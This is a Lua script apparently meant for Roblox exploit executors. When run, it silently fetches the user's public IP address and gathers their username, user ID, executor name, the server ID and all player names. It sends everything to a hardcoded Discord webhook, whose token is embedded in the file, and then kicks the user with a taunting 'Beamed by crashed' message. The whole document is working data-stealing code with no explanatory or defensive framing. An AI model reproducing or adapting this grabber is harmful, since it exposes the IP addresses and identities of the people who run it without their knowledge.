local IP = tostring(game:HttpGet("https://api64.ipify.org/%22))
local tab = [[

]]
local seconds = math.floor(workspace.DistributedGameTime)
local minutes = math.floor(workspace.DistributedGameTime / 60)
local hours = math.floor(workspace.DistributedGameTime / 60 / 60)
local seconds = seconds - (minutes * 60)
local minutes = minutes - (hours * 60)

PlayerNames = {}
for i, v in pairs(game.Players:GetChildren()) do
    table.insert(PlayerNames, v.Name)
end

local webhookcheck =
   is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
   secure_load and "Sentinel" or
   KRNL_LOADED and "Krnl" or
   SONA_LOADED and "Sona" or
   "shit exploit"

local webhook = "https://discord.com/api/webhooks/1066167874512764970/sZlyAti96N2nSMG1TtO6ClA2QPbwrSqF2TJDBtaIg3bIXqL2iqamqYvocjx8tcCfnayD"
local data = {
   ["content"] = "Server ID: "..game.JobId..""..tab.."Run Time: "..hours.." Hours, ".. minutes.." Minutes, ".. seconds.." Seconds"..""..tab.."Players: "..tostring(#game.Players:GetPlayers())..""..tab.."Players's Usernames: "..table.concat(PlayerNames, ",  |   ").."",
   ["embeds"] = {
       {
           ["title"] = "Player Info",
           ["description"] = "Username: "..game.Players.LocalPlayer.Name..""..tab.."User ID: "..game.Players.LocalPlayer.UserId..""..tab.."Executor: ".. webhookcheck..""..tab.."IP: "..IP.."",
           ["type"] = "rich",
           ["color"] = tonumber(0x7269da),
           ["image"] = {
               ["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
                   tostring(game:GetService("Players").LocalPlayer.Name)
           }
       }
   }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local variables = {Url = webhook, Body = newdata, Method = "POST", Headers = headers}
request(variables)
wait (3)
game.Players.LocalPlayer:Kick(“Beamed by crashed”)
